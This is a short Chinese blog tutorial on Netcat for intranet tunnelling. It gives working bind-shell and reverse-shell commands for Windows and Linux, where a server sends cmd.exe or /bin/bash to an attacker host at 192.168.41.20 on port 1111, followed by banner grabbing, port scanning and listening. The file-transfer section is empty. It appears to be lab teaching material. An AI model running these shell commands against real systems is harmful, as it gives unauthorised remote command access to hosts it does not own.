内网隧道代理

Netcat反弹shell

一:正向代理

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军&刀

windows机器 nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe 
linux机器 nc -lvvp 1111 -e /bin/bash

攻击机机

nc64.exe 192.168.41.130 1111

得到正向代理shell

二:反向代理

攻击者机器 192.168.41.20 不能直接访问服务器,但是服务器 192.168.41.130 可以访问攻击者的机器,这个时候可以使用反向shell

在攻击者机器运行

#监听1111端口 nc64.exe -lvvp 1111

在服务器上运行(反弹到攻击机上)

windos机器 nc64.exe -e C:\Windows\System32\cmd.exe 192.168.41.20 1111 
linux机器 nc -e /bin/bash 192.168.41.20 1111

三:Netcat的其他用法

靶机运行着ssh服务,可以查看服务的版本

nc64.exe -nv IP Port

端口探测

可以查看端口的开放情况,可以看到我们目标服务器的80端口没有开放

nc64.exe -v IP Port

多端口扫描

可以查看多端口是否开放和允许的服务

nc -v -z IP Port[1]-Port[65535]

端口监听

监听端口,当访问该端口会输出该信息

nc64.exe -l -p Port

文件传输

posted @   江城子!  阅读(38)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
levels of contents
点击右上角即可分享
微信分享提示